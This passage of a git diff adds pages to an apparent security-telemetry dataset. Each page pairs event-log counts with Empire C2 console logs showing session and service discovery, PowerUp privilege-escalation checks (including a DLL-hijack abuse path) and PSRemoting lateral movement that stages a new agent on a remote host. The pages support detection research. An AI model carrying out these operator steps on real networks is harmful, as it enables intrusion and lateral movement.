Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 374 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 162 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 103 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 562 | + +## Attacker Activity + +``` +(Empire: H3DKB8SA) > usemodule situational_awareness/network/powerview/get_session +(Empire: powershell/situational_awareness/network/powerview/get_session) > info + + Name: Get-NetSession + Module: powershell/situational_awareness/network/powerview/get_session + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + +Description: + Execute the NetSessionEnum Win32API call to query a given + host for active sessions on the host. Part of PowerView. + +Comments: + https://github.com/PowerShellMafia/PowerSploit/blob/dev/Reco + n/ + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + ComputerName False localhost The hostname or IP to query for local + group users. + Agent True H3DKB8SA Agent to run module on. 
+ +(Empire: powershell/situational_awareness/network/powerview/get_session) > set ComputerName HFDC01 +(Empire: powershell/situational_awareness/network/powerview/get_session) > execute +[*] Tasked H3DKB8SA to run TASK_CMD_JOB +[*] Agent H3DKB8SA tasked with task ID 19 +[*] Tasked agent H3DKB8SA to run module powershell/situational_awareness/network/powerview/get_session +(Empire: powershell/situational_awareness/network/powerview/get_session) > Job started: VMY6RB + +CName UserName Time IdleTime ComputerName +----- -------- ---- -------- ------------ +\\172.18.39.106 nmartha 1 1 HFDC01 +\\172.18.39.106 pgustavo 352718 55 HFDC01 + +Get-NetSession completed! + +(Empire: powershell/situational_awareness/network/powerview/get_session) > +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.tar.gz b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.tar.gz new file mode 100644 index 00000000..903c6bfb Binary files /dev/null and b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.tar.gz differ diff --git a/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.md b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.md new file mode 100644 index 00000000..faee3665 --- /dev/null +++ b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.md 
@@ -0,0 +1,107 @@ +# Empire Get Sesion Local + +Execute the NetSessionEnum Win32API call to query the local host for active sessions. + +## Technique(s) ID + +T1049 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_get_session_local.tar.gz](./empire_get_session_local.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-19005224 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 811 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 191 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 144 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 28 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 15 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 13 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 13 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 13 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 11 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 7 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 6 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 5 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 4 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 2 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | 
+| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1841 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 218 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 174 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 162 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 26 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 21 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 698 | + +## Attacker Activity + +``` +(Empire: H3DKB8SA) > usemodule situational_awareness/network/powerview/get_session +(Empire: powershell/situational_awareness/network/powerview/get_session) > info + + Name: Get-NetSession + Module: powershell/situational_awareness/network/powerview/get_session + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + +Description: + Execute the NetSessionEnum Win32API call to query a given + host for active sessions on the host. Part of PowerView. + +Comments: + https://github.com/PowerShellMafia/PowerSploit/blob/dev/Reco + n/ + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + ComputerName False localhost The hostname or IP to query for local + group users. 
+ Agent True H3DKB8SA Agent to run module on. + +(Empire: powershell/situational_awareness/network/powerview/get_session) > set ComputerName HFDC01 +(Empire: powershell/situational_awareness/network/powerview/get_session) > execute +[*] Tasked H3DKB8SA to run TASK_CMD_JOB +[*] Agent H3DKB8SA tasked with task ID 19 +[*] Tasked agent H3DKB8SA to run module powershell/situational_awareness/network/powerview/get_session +(Empire: powershell/situational_awareness/network/powerview/get_session) > Job started: VMY6RB + +CName UserName Time IdleTime ComputerName +----- -------- ---- -------- ------------ +\\172.18.39.106 nmartha 1 1 HFDC01 +\\172.18.39.106 pgustavo 352718 55 HFDC01 + +Get-NetSession completed! + +(Empire: powershell/situational_awareness/network/powerview/get_session) > +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.tar.gz b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.tar.gz new file mode 100644 index 00000000..783329a9 Binary files /dev/null and b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.tar.gz differ diff --git a/small_datasets/windows/discovery/system_service_discovery_T1007/README.md b/small_datasets/windows/discovery/system_service_discovery_T1007/README.md new file mode 100644 index 00000000..01a2afc0 --- /dev/null +++ b/small_datasets/windows/discovery/system_service_discovery_T1007/README.md 
@@ -0,0 +1,10 @@ +# System Service Discovery + +Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net, but adversaries may also use other tools as well. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_net_start](./empire_net_start.md) | 2019-05-18220124 | +| shire | [empire_powerup_al_checks](./empire_powerup_all_checks.md) | 2019-05-18182927 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.md b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.md new file mode 100644 index 00000000..df3a2718 --- /dev/null +++ b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.md 
@@ -0,0 +1,156 @@ +# Empire Net Start + +An adversary can enumerate the services available on the system via net.exe + +## Technique(s) ID + +T1007 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_net_start.tar.gz](./empire_net_start.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18220124 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 283 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 90 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 44 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 12 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 6 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 6 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 6 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 3 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 1 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 153 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 77 | 
+| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 52 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 33 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 13 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 235 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > shell net start +[*] Tasked V6W3TH8Y to run TASK_SHELL +[*] Agent V6W3TH8Y tasked with task ID 8 +(Empire: V6W3TH8Y) > These Windows services are started: + + Application Information + AVCTP service + Background Intelligent Transfer Service + Background Tasks Infrastructure Service + Base Filtering Engine + Certificate Propagation + Clipboard User Service_c5665 + CNG Key Isolation + COM+ Event System + Connected Devices Platform Service + Connected Devices Platform User Service_c5665 + Connected User Experiences and Telemetry + Contact Data_c5665 + CoreMessaging + Credential Manager + Cryptographic Services + Data Sharing Service + Data Usage + DCOM Server Process Launcher + DHCP Client + Diagnostic Policy Service + Diagnostic Service Host + Distributed Link Tracking Client + DNS Client + Geolocation Service + IKE and AuthIP IPsec Keying Modules + IP Helper + IPsec Policy Agent + Local Session Manager + Netlogon + Network 
Connection Broker + Network List Service + Network Location Awareness + Network Store Interface Service + Plug and Play + Power + Print Spooler + Program Compatibility Assistant Service + Remote Desktop Configuration + Remote Desktop Services + Remote Desktop Services UserMode Port Redirector + Remote Procedure Call (RPC) + RPC Endpoint Mapper + Secondary Logon + Security Accounts Manager + Security Center + Server + Shell Hardware Detection + SSDP Discovery + State Repository Service + Storage Service + Sync Host_c5665 + Sysmon + System Event Notification Service + System Events Broker + System Guard Runtime Monitor Broker + Task Scheduler + TCP/IP NetBIOS Helper + Themes + Time Broker + Touch Keyboard and Handwriting Panel Service + Update Orchestrator Service + User Data Access_c5665 + User Data Storage_c5665 + User Manager + User Profile Service + WarpJITSvc + Web Account Manager + Windows Audio + Windows Audio Endpoint Builder + Windows Connection Manager + Windows Defender Firewall + Windows Event Log + Windows Font Cache Service + Windows License Manager Service + Windows Licensing Monitoring Service + Windows Management Instrumentation + Windows Push Notifications System Service + Windows Push Notifications User Service_c5665 + Windows Remote Management (WS-Management) + Windows Search + Windows Security Service + Windows Time + WinHTTP Web Proxy Auto-Discovery Service + Workstation + +The command completed successfully. + + +..Command execution completed. + +(Empire: V6W3TH8Y) > +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.tar.gz b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.tar.gz new file mode 100644 index 00000000..3f7230ef Binary files /dev/null and b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.tar.gz differ 
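Review bot: the "Time Taken" section in empire_net_start.md holds a collection timestamp ("2019-05-18220124"), not a duration, and the value runs date and time together with no separator; the same section appears in every dataset file added by this patch and the same raw form is used in the `Updated` column of the README tables, so consider renaming it (for example "Collection Time") and writing the value as `2019-05-18 22:01:24` so it can be parsed and matched against event timestamps in the archive. In the "About this file" table, `record_number` reads as a per-task event count (`Process Creation | 2` next to `Process Create (rule: ProcessCreate) | 2`) rather than an event record id; a header such as `event_count` would avoid confusion when analysts pivot from the table into the logs. The file also ends with "\ No newline at end of file"; add the trailing newline.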
diff --git a/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.md b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.md new file mode 100644 index 00000000..c26dc114 --- /dev/null +++ b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.md 
@@ -0,0 +1,167 @@ +# Empire Powerup All Checks + +Runs all current checks for Windows privesc vectors. + +## Technique(s) ID + +T1007 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_powerup_all_checks.tar.gz](./empire_powerup_all_checks.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18182927 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 2057 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Service Control Manager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 112 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 106 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 36 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 24 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 17 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 9 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 8 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 8 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 7 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 7 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 6 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 4 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service 
Ticket Operations | 2 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 235 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 173 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 87 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 59 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 25 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 8 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2022 | + +## Attacker Activity + +``` +(Empire: H3DKB8SA) > usemodule privesc/powerup/allchecks +(Empire: powershell/privesc/powerup/allchecks) > info + + Name: Invoke-AllChecks + Module: powershell/privesc/powerup/allchecks + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + +Description: + Runs all current checks for Windows privesc vectors. 
+ +Comments: + https://github.com/PowerShellEmpire/PowerTools/tree/master/P + owerUp + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True H3DKB8SA Agent to run module on. + +(Empire: powershell/privesc/powerup/allchecks) > execute +[*] Tasked H3DKB8SA to run TASK_CMD_JOB +[*] Agent H3DKB8SA tasked with task ID 1 +[*] Tasked agent H3DKB8SA to run module powershell/privesc/powerup/allchecks +(Empire: powershell/privesc/powerup/allchecks) > Job started: XSHUNF + +[*] Running Invoke-AllChecks + + +[*] Checking if user is in a local group with administrative privileges... +[+] User is in a local group that grants administrative privileges! +[+] Run a BypassUAC attack to elevate privileges to admin. + + +[*] Checking for unquoted service paths... + + +[*] Checking service executable and argument permissions... + + +[*] Checking service permissions... + + +[*] Checking %PATH% for potentially hijackable DLL locations... + + +ModifiablePath : C:\Users\nmartha\AppData\Local\Microsoft\WindowsApps +IdentityReference : SHIRE\nmartha +Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...} +%PATH% : C:\Users\nmartha\AppData\Local\Microsoft\WindowsApps +AbuseFunction : Write-HijackDll -DllPath 'C:\Users\nmartha\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll' + + + + + +[*] Checking for AlwaysInstallElevated registry key... + + +[*] Checking for Autologon credentials in registry... + + +[*] Checking for modifidable registry autoruns and configs... + + +[*] Checking for modifiable schtask files/configs... + + +[*] Checking for unattended install files... + + +[*] Checking for encrypted web.config strings... + + +[*] Checking for encrypted application pool and virtual directory passwords... + + +[*] Checking for plaintext passwords in McAfee SiteList.xml files.... + + + + +[*] Checking for cached Group Policy Preferences .xml files.... 
+ + +Changed : [BLANK] +UserNames : [BLANK] +NewName : [BLANK] +Passwords : [BLANK] +File : C:\ProgramData\Microsoft\Group + Policy\History\{D0D4B108-2AA4-40A4-AAB2-066DB35CF4A8}\Machine\Preferences\Groups\Groups.xml + +Invoke-AllChecks completed! +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.tar.gz b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.tar.gz new file mode 100644 index 00000000..331a0aaa Binary files /dev/null and b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.tar.gz differ diff --git a/small_datasets/windows/execution/powershell_T1086/README.md b/small_datasets/windows/execution/powershell_T1086/README.md new file mode 100644 index 00000000..fbd0b0b6 --- /dev/null +++ b/small_datasets/windows/execution/powershell_T1086/README.md @@ -0,0 +1,9 @@ +# PowerShell + +PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_psremoting](./empire_invoke_psremoting.md) | 2019-05-18211456 | \ No newline at end of file diff --git a/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.md b/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.md new file mode 100644 index 00000000..046811a7 --- /dev/null +++ b/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.md 
@@ -0,0 +1,145 @@ +# Empire Invoke Psremoting + +Executes a stager on remote hosts using PSRemoting. + +## Technique(s) ID + +T1086 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_psremoting.tar.gz](./empire_invoke_psremoting.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18211456 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 850 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 12 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 288 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 183 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 72 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 35 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 25 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 23 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 19 | +| Security | Microsoft-Windows-Security-Auditing | User Account Management | 16 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 14 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 13 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 13 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 11 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 7 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 6 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 3 | +| Security | 
Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 994 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 795 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 777 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 383 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 255 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 28 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 25 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 21 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 19 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 15 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 6 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 721 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | na | 12 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Connect | 5 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 3 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console 
Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Stopping Command | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > usemodule lateral_movement/invoke_psremoting +(Empire: powershell/lateral_movement/invoke_psremoting) > info + + Name: Invoke-PSRemoting + Module: powershell/lateral_movement/invoke_psremoting + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @harmj0y + +Description: + Executes a stager on remote hosts using PSRemoting. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to use. + CredID False CredID from the store to use. + ComputerName True Host[s] to execute the stager on, comma + separated. + Proxy False default Proxy to use for request (default, none, + or other). + UserName False [domain\]username to use to execute + command. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Password False Password to use to execute command. + Agent True V6W3TH8Y Agent to run module on. 
+ +(Empire: powershell/lateral_movement/invoke_psremoting) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_psremoting) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_psremoting) > execute +[*] Tasked V6W3TH8Y to run TASK_CMD_WAIT +[*] Agent V6W3TH8Y tasked with task ID 4 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_psremoting +(Empire: powershell/lateral_movement/invoke_psremoting) > [*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent 1NA52YVC checked in +[+] Initial agent 1NA52YVC from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to 1NA52YVC at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_psremoting) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:15:55 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:15:55 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:15:57 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 21:15:31 https + XSZ91N7T ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 4172 5/0.0 2019-05-18 21:15:57 https + 1NA52YVC ps 172.18.39.105 IT001 *SHIRE\pgustavo powershell 6884 5/0.0 2019-05-18 21:15:55 https + + +(Empire: agents) > interact 1NA52YVC +(Empire: 1NA52YVC) > shell whoami +[*] Tasked 1NA52YVC to run TASK_SHELL +[*] Agent 1NA52YVC tasked with task ID 1 +(Empire: 1NA52YVC) > shire\pgustavo +..Command execution completed. + +(Empire: 1NA52YVC) > +``` \ No newline at end of file 
diff --git a/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.tar.gz b/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.tar.gz new file mode 100644 index 00000000..fbc4b3fc Binary files /dev/null and b/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.tar.gz differ diff --git a/small_datasets/windows/execution/scripting_T1064/README.md b/small_datasets/windows/execution/scripting_T1064/README.md new file mode 100644 index 00000000..79dda3cd --- /dev/null +++ b/small_datasets/windows/execution/scripting_T1064/README.md @@ -0,0 +1,9 @@ +# Scripting + +Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_launcher_vbs](./empire_launcher_vbs.md) | 2019-05-18182022 | \ No newline at end of file diff --git 